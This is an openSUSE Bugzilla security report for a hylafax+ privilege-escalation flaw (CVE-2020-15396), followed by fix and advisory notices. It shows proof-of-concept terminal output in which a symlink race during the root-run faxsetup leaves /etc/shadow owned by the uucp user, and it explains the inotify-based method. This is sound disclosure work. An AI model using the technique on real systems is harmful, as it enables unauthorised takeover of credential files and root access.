Bugzilla – Bug 1173521
VUL-0: CVE-2020-15396: hylafax+: Chown as root in user controlled directories allows for privilege escalation
Last modified: 2020-09-18 16:50:49 UTC
POC: sh-5.0$ id uid=10(uucp) gid=14(uucp) groups=14(uucp),54(lock) context=unconfined_u:unconfined_r:unconfined_t:s0 sh-5.0$ pwd /var/spool/hylafax/etc sh-5.0$ ls -l /etc/shadow -rw-r-----. 1 root shadow 1247 Jun 9 08:46 /etc/shadow sh-5.0$ /tmp/poc . # now while this poc is running start faxsetup as root [+] watching . [+] unlinked access log [+] added link -rw-r-----. 1 root shadow 1.3K Jun 9 08:46 /etc/shadow [+] skipping link setup.tmp -rw-r-----. 1 root shadow 1.3K Jun 9 08:46 /etc/shadow [+] added link -rw-r-----. 1 root shadow 1.3K Jun 9 08:46 /etc/shadow [+] skipping link Fontmap.HylaFAX -rw-r-----. 1 root shadow 1.3K Jun 9 08:46 /etc/shadow [+] added link -r--r--r--. 1 root shadow 1.3K Jun 9 08:46 /etc/shadow [+] skipping link setup.cache -r--r--r--. 1 root shadow 1.3K Jun 9 08:46 /etc/shadow [+] added link -r--r--r--. 1 root shadow 1.3K Jun 9 08:46 /etc/shadow [+] skipping link config -r--r--r--. 1 uucp shadow 1.3K Jun 9 08:46 /etc/shadow /etc/shadow is now owned by uucp The issue is here in setupfax 2392 $CHOWN $faxUID $CONFIG; $CHGRP $faxGID $CONFIG 2393 $CHMOD 644 $CONFIG $CONFIG is created, but in a directory where uucp can unlink it and exchange it with a symlink to /etc/shadow. Doing this via inotify is 100% stable on my system. Indirectly fixed by the changed permissions in https://sourceforge.net/p/hylafax/HylaFAX+/2534/
I have submitted https://build.opensuse.org/request/show/825727 containing hylafax 7.0.3 - this should contain the remaining fixes @Johannes - please review and close bug if satisfied
This is an autogenerated message for OBS integration: This bug (1173521) was mentioned in https://build.opensuse.org/request/show/825731 Factory / hylafax+ https://build.opensuse.org/request/show/825733 15.2 / hylafax+ https://build.opensuse.org/request/show/825734 15.1 / hylafax+
openSUSE-SU-2020:1209-1: An update that fixes two vulnerabilities is now available. Category: security (moderate) Bug References: 1173519,1173521 CVE References: CVE-2020-15396,CVE-2020-15397 JIRA References: Sources used: openSUSE Leap 15.2 (src): hylafax+-7.0.3-lp152.3.6.1
openSUSE-SU-2020:1210-1: An update that fixes two vulnerabilities is now available. Category: security (moderate) Bug References: 1173519,1173521 CVE References: CVE-2020-15396,CVE-2020-15397 JIRA References: Sources used: openSUSE Leap 15.1 (src): hylafax+-7.0.3-lp151.4.6.1
openSUSE-SU-2020:1231-1: An update that fixes two vulnerabilities is now available. Category: security (moderate) Bug References: 1173519,1173521 CVE References: CVE-2020-15396,CVE-2020-15397 JIRA References: Sources used: openSUSE Backports SLE-15-SP1 (src): hylafax+-7.0.3-bp151.6.4.1
fixed, thank you
openSUSE-SU-2020:1438-1: An update that fixes two vulnerabilities is now available. Category: security (moderate) Bug References: 1173519,1173521 CVE References: CVE-2020-15396,CVE-2020-15397 JIRA References: Sources used: openSUSE Backports SLE-15-SP2 (src): hylafax+-7.0.3-bp152.3.4.1